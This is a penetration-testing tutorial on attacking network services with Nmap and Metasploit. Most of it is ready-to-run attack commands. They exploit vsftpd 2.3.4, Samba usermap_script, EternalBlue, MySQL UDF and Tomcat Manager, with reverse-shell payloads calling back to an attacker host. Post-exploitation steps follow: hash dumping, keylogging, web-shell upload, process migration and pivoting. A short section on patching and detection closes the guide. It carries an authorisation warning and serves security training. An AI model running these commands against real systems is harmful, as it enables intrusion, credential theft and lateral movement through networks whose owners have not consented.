1. Attack Methodology Overview

Server-side attacks follow a structured intelligence-gather-then-exploit loop. Rushing to exploitation without thorough enumeration leads to missed vulnerabilities and noisy, failed attempts.

  1. Target scoping — define the IP range, resolve hostnames, identify live hosts
  2. Port discovery — find all open TCP/UDP ports (full port scan)
  3. Service & version detection — identify what is running on each port
  4. Vulnerability research — cross-reference versions against CVE databases and Metasploit modules
  5. Exploitation — run the appropriate exploit with correct options
  6. Post-exploitation — enumerate the system, escalate privileges, pivot
  7. Reporting — document with timestamps, screenshots, and impact analysis

Authorisation required: All techniques in this guide must only be performed on systems you own or have explicit written permission to test. Unauthorised port scanning and exploitation is illegal in most jurisdictions regardless of intent.

2. Nmap — Service & Version Detection

Nmap is the foundation of network reconnaissance. The flags you choose determine how much information you get vs how much noise you make on the network.

Discovery scan — find live hosts first

# ICMP ping sweep — fast host discovery
nmap -sn 192.168.1.0/24

# ARP ping (local network, more reliable)
nmap -PR -sn 192.168.1.0/24

# Skip ping — scan all IPs regardless of ICMP response
nmap -Pn 192.168.1.0/24

Full TCP port scan with version detection

# Scan all 65535 ports + version detection
nmap -p- -sV 192.168.1.100

# Aggressive scan — version + OS + script + traceroute
nmap -A -p- 192.168.1.100

# Fast scan of top 1000 ports first, then expand
nmap -sV --top-ports 1000 192.168.1.100

# Save output in all formats (normal, grepable, XML)
nmap -sV -oA output/target_scan 192.168.1.100

Version detection intensity

The -sV flag probes services to determine their version. The --version-intensity flag (0–9) controls how aggressively Nmap probes:

Flag               Description                         Noise
--version-light    Fastest, most likely probes only    Low
-sV (default)      Standard intensity (level 7)        Medium
--version-all      All probes — maximum accuracy       High

Vulnerability scripts (NSE)

Nmap's Scripting Engine (NSE) runs Lua scripts against discovered services. The vuln category runs checks for known CVEs:

# Run all vulnerability check scripts
nmap --script vuln -p 21,22,80,443,445,3389 192.168.1.100

# Specific service scripts
nmap --script ftp-anon,ftp-vsftpd-backdoor -p 21 192.168.1.100
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.100
nmap --script http-shellshock -p 80,443 192.168.1.100
nmap --script ssl-heartbleed -p 443 192.168.1.100

# Auth and brute-force scripts
nmap --script ssh-brute -p 22 192.168.1.100
nmap --script http-auth-finder -p 80 192.168.1.100

UDP scan — don't forget non-TCP services

# UDP scan (requires root, slower)
nmap -sU --top-ports 100 192.168.1.100

# Common UDP targets: DNS (53), SNMP (161), NTP (123), TFTP (69)

3. Interpreting Nmap Output

Reading Nmap output correctly determines which path to exploitation. Here's how to analyse a real scan result:

PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open   http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3306/tcp open   mysql       MySQL 5.0.51a-3ubuntu5
5900/tcp open   vnc         VNC (protocol 3.3)
8180/tcp open   http        Apache Tomcat/Coyote JSP engine 1.1

Every highlighted line above is a known exploitable version; the vsftpd, OpenSSH, Samba, MySQL and Tomcat entries are worked through in section 6.

Version accuracy: Nmap's version detection reads service banners and probes. Some services fake or suppress banners. If a version looks too old or generic, run --version-all to probe harder, or connect manually with nc to read the raw banner.
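As an added example (not part of the original guide), the Python script below triages the scan table above against the affected version ranges this guide states in section 6, and treats a banner with no concrete version as the "too generic" case from the callout rather than as a pass. The watchlist entries, their notes and the sample text are this example's own construction.

```python
import re
# Constructed sample: the Nmap normal-output table shown in this section (VNC line omitted).
SAMPLE_SCAN = """\
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
80/tcp   open   http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3306/tcp open   mysql       MySQL 5.0.51a-3ubuntu5
8180/tcp open   http        Apache Tomcat/Coyote JSP engine 1.1
"""

# Watchlist from the affected ranges this guide states; a None predicate flags the product
# on any version (config check). Bound 3.0.25 also catches the unaffected final 3.0.25.
WATCHLIST = [
    ("vsftpd",  lambda v: v == (2, 3, 4),              "vsftpd 2.3.4 backdoor (CVE-2011-2523)"),
    ("Samba",   lambda v: (3, 0, 0) <= v <= (3, 0, 25), "Samba usermap_script (CVE-2007-2447)"),
    ("OpenSSH", lambda v: v < (7, 7),                  "OpenSSH username enumeration (CVE-2018-15473)"),
    ("MySQL",   None, "check remote root login and that mysqld does not run as root"),
    ("Tomcat",  None, "check Manager interface exposure and default credentials"),
]

PORT_LINE = re.compile(r"^(\d+/(?:tcp|udp))\s+(\S+)\s+(\S+)\s*(.*)$")

def version_tuple(banner):
    """First dotted number as ints, '4.7p1 Debian' -> (4, 7); None if no concrete version."""
    m = re.search(r"\b(\d+(?:\.\d+)+)", banner)
    return tuple(int(x) for x in m.group(1).split(".")) if m else None

def triage(scan_text):
    """Return (port, banner, finding) for every open service that needs attention."""
    findings = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line)
        if not m or m.group(2) != "open":
            continue
        port, banner = m.group(1), m.group(4)
        version = version_tuple(banner)
        for product, affected, note in WATCHLIST:
            if product not in banner:
                continue
            if affected is not None and version is None:
                # Product matched but no concrete version: the "too generic" case above.
                note = "version unresolved: rerun with --version-all or read the banner with nc"
            elif affected is not None and not affected(version):
                continue
            findings.append((port, banner, note))
    return findings
```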

Manual banner grabbing

# Grab raw banner with netcat
nc -nv 192.168.1.100 21
# Response: 220 (vsFTPd 2.3.4)

nc -nv 192.168.1.100 25
# Response: 220 mail.target.com ESMTP Postfix (Ubuntu)

# HTTP banner with curl
curl -I http://192.168.1.100/
# Server: Apache/2.2.8 (Ubuntu) DAV/2

4. Rapid7 — CVE & Module Research

Once you have service versions, you need to find whether exploits exist. Rapid7 maintains two invaluable resources: the Metasploit module database and the Vulnerability & Exploit Database.

Rapid7 Vulnerability Database

At rapid7.com/db/ you can search by CVE number, software name, or vulnerability type. Each entry shows:

Searching Metasploit for a specific version

# Search by CVE
msf6 > search cve:2007-2447

# Search by product name and type
msf6 > search name:vsftpd type:exploit
msf6 > search name:samba type:exploit
msf6 > search name:ms17-010

# Filter by platform
msf6 > search platform:linux type:exploit rank:excellent

# Search by port
msf6 > search port:21

Understanding module ranks

Rank               Meaning
ExcellentRanking   Reliable, no crash risk, clean exploitation
GreatRanking       Works well, minor side effects possible
GoodRanking        Functional but may not work in all conditions
NormalRanking      Works but has reliability constraints
AverageRanking     Not reliable, use only if nothing better exists
ManualRanking      Requires manual interaction or is a DoS risk

Always prefer excellent or great rank modules in engagements. Lower-rank modules can crash the service and take down production systems.


5. Metasploit Framework — Core Workflow

Metasploit is an open-source penetration testing framework maintained by Rapid7. It provides a consistent interface to hundreds of exploits, payloads, auxiliary modules, and post-exploitation tools.

Initialising Metasploit with database

# Start PostgreSQL and Metasploit services (Kali)
sudo systemctl start postgresql
sudo msfdb init
msfconsole

# Import Nmap results directly into the database
msf6 > db_import output/target_scan.xml    # the .xml written by -oA above

# View discovered hosts and services
msf6 > hosts
msf6 > services
msf6 > services -p 445          # filter by port
msf6 > services -S vsftpd       # filter by service name

# Run Nmap directly from within msfconsole
msf6 > db_nmap -sV -p- 192.168.1.100

Core module commands

# Select a module
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

# View required options
msf6 exploit(vsftpd_234_backdoor) > show options

# Set required values
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT  21
msf6 > set LHOST  192.168.1.50   # your attacker IP
msf6 > set LPORT  4444

# View available payloads for the selected exploit
msf6 > show payloads

# Set a specific payload
msf6 > set payload cmd/unix/interact

# Run with/without check first
msf6 > check         # passive check — does target appear vulnerable?
msf6 > run           # or: exploit

# Run against multiple hosts from database
msf6 > set RHOSTS file:/path/to/hosts.txt
msf6 > run -j         # run as background job

Auxiliary modules — scanners without exploitation

# SMB version scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 > set RHOSTS 192.168.1.0/24
msf6 > run

# FTP anonymous login scanner
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 > set RHOSTS 192.168.1.0/24
msf6 > run

# SSH brute force
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 > set RHOSTS 192.168.1.100
msf6 > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf6 > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 > set STOP_ON_SUCCESS true
msf6 > run

# HTTP directory scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 > set RHOSTS 192.168.1.100
msf6 > run

6. Exploiting Common Services

SERVICE 01 FTP — vsftpd 2.3.4 Backdoor (CVE-2011-2523)

vsftpd 2.3.4 was trojanised on the official download server. The backdoor activates when a smiley face :) is appended to any username. It opens a root shell listener on port 6200.

# Detection: Nmap shows vsftpd 2.3.4
PORT  STATE SERVICE VERSION
21/tcp open  ftp     vsFTPd 2.3.4

# Exploit
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > run

# Result
[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
Command shell session 1 opened

The backdoor opens a cmd/unix/interact shell. Upgrade it to a Meterpreter session by running a stager payload through the shell.

SERVICE 02 SMB — Samba usermap_script (CVE-2007-2447)

Samba 3.0.0–3.0.25rc3 allows command injection through shell metacharacters in the username when using the non-default username map script option. No credentials required.

# Detection
nmap --script smb-vuln-cve-2007-2447 -p 445 192.168.1.100

# Exploit
msf6 > use exploit/multi/samba/usermap_script
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/reverse_netcat
msf6 > set LHOST 192.168.1.50
msf6 > run

# Result: root shell without authentication
uid=0(root) gid=0(root)

SERVICE 03 SMB — EternalBlue MS17-010 (CVE-2017-0144)

EternalBlue exploits a buffer overflow in SMBv1's handling of transaction requests. The NSA-developed exploit was leaked and later used by WannaCry and NotPetya. Unpatched Windows systems (XP, 7, Server 2008) are affected.

# Detect with Nmap NSE
nmap --script smb-vuln-ms17-010 -p 445 192.168.1.100
# Output: VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1

# Exploit (deliver Meterpreter)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set RHOSTS 192.168.1.100
msf6 > set LHOST 192.168.1.50
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > run

# If first attempt fails, try the psexec variant
msf6 > use exploit/windows/smb/ms17_010_psexec

SERVICE 04 SSH — Username Enumeration (CVE-2018-15473)

OpenSSH before 7.7 responds differently to authentication attempts for valid vs invalid usernames during the key exchange phase, allowing enumeration without a password.

# Metasploit module
msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 > set RHOSTS 192.168.1.100
msf6 > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf6 > set CHECK_FALSE true
msf6 > run

# Then brute force valid usernames
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 > set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
msf6 > run

SERVICE 05 MySQL — UDF Command Execution (root login)

When MySQL runs as root and allows remote root login with a weak or no password, the UDF (User-Defined Function) technique writes a shared library to the plugin directory and creates a function that executes OS commands.

# Check for root login
msf6 > use auxiliary/scanner/mysql/mysql_login
msf6 > set RHOSTS 192.168.1.100
msf6 > set USERNAME root
msf6 > set BLANK_PASSWORDS true
msf6 > run

# UDF exploitation once root access confirmed
msf6 > use exploit/multi/mysql/mysql_udf_payload
msf6 > set RHOSTS 192.168.1.100
msf6 > set USERNAME root
msf6 > set PASSWORD ""          # blank root password confirmed by the scanner above
msf6 > set payload linux/x86/meterpreter/reverse_tcp
msf6 > run

SERVICE 06 Apache Tomcat — Manager Deploy (CVE multiple)

Apache Tomcat's Manager interface allows deploying WAR files. If exposed and using default or weak credentials, an attacker can deploy a malicious WAR containing a JSP web shell or Meterpreter stager.

# Scan for manager interface
nmap --script http-tomcat-manager -p 8080,8180,8443 192.168.1.100

# Brute force manager credentials
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT  8180
msf6 > run

# Deploy malicious WAR file
msf6 > use exploit/multi/http/tomcat_mgr_upload
msf6 > set RHOSTS 192.168.1.100
msf6 > set RPORT  8180
msf6 > set HttpUsername tomcat
msf6 > set HttpPassword tomcat
msf6 > set payload java/meterpreter/reverse_tcp
msf6 > run

7. Meterpreter — Post-Exploitation

Meterpreter is Metasploit's advanced in-memory payload. It runs entirely in RAM, leaves no files on disk, and communicates over an encrypted channel. It is the standard payload for post-exploitation work.

Core Meterpreter commands

# System information
meterpreter > sysinfo
meterpreter > getuid          # current user
meterpreter > getpid          # process ID
meterpreter > ps              # running processes

# Privilege escalation
meterpreter > getsystem       # attempt automated priv esc
meterpreter > getuid          # verify: NT AUTHORITY\SYSTEM

# Credential dumping
meterpreter > hashdump        # dump local SAM database (Windows)
meterpreter > run post/linux/gather/hashdump     # Linux /etc/shadow
meterpreter > run post/multi/recon/local_exploit_suggester  # find local exploits

# File system
meterpreter > pwd
meterpreter > ls
meterpreter > download /etc/passwd .
meterpreter > upload shell.php /var/www/html/
meterpreter > search -f *.conf -d /etc

# Networking
meterpreter > ifconfig
meterpreter > arp
meterpreter > route

# Screenshot and keylogger
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

Process migration

The process Meterpreter initially runs in may be killed by the user or an AV. Migrate to a stable, long-running process for persistence:

# List processes and find a stable target
meterpreter > ps
# PID   Name        Arch  User
# 1234  explorer.exe  x64  DESKTOP\masaaki
# 4567  svchost.exe   x64  NT AUTHORITY\SYSTEM  ← migrate here

meterpreter > migrate 4567

Session management

# Background current session and list all sessions
meterpreter > background
msf6 > sessions -l

# Interact with a session
msf6 > sessions -i 1

# Upgrade a basic shell to Meterpreter
msf6 > sessions -u 1

8. Pivoting & Port Forwarding

When you compromise a host that has access to an internal network unreachable from your machine, you pivot through it to reach the next target.

# Add a route through a compromised host
msf6 > route add 10.10.10.0/24 1   # via session 1
msf6 > route print

# Now scan internal network through the pivot
msf6 > use auxiliary/scanner/portscan/tcp
msf6 > set RHOSTS 10.10.10.0/24
msf6 > set PORTS  22,80,443,3389,445
msf6 > run

# Port forward — map internal port to your local port
meterpreter > portfwd add -l 13306 -p 3306 -r 10.10.10.50
# Now connect: mysql -h 127.0.0.1 -P 13306

# SOCKS proxy through pivot (for tools like proxychains)
msf6 > use auxiliary/server/socks_proxy
msf6 > set VERSION 5
msf6 > set SRVPORT 1080
msf6 > run -j
# Then: proxychains nmap -sV 10.10.10.50

9. Detection & Prevention

Patch Management

Every service in this post was exploited via a known CVE. Apply security patches within 30 days of release, prioritising internet-facing services.

Disable Legacy Protocols

Disable SMBv1 entirely. Do not run FTP — use SFTP. Disable Telnet, rsh, rlogin. These protocols have no place on modern infrastructure.

Firewall Segmentation

Restrict which hosts can reach which ports. Database ports (3306, 5432) should never be reachable from the internet. Use network ACLs and host-based firewalls.

Default Credential Audit

Scan your own network with the same Metasploit auxiliary modules. Any service accepting default or empty passwords is an immediate remediation item.

IDS / IPS Monitoring

Deploy Snort or Suricata with updated rule sets. EternalBlue, vsftpd backdoor, and Tomcat exploit traffic all have well-known signatures.

Run Services as Non-Root

MySQL, Apache, Nginx, and most services should not run as root. Use dedicated low-privilege service accounts. If the service is exploited, the attacker gets that account — not root.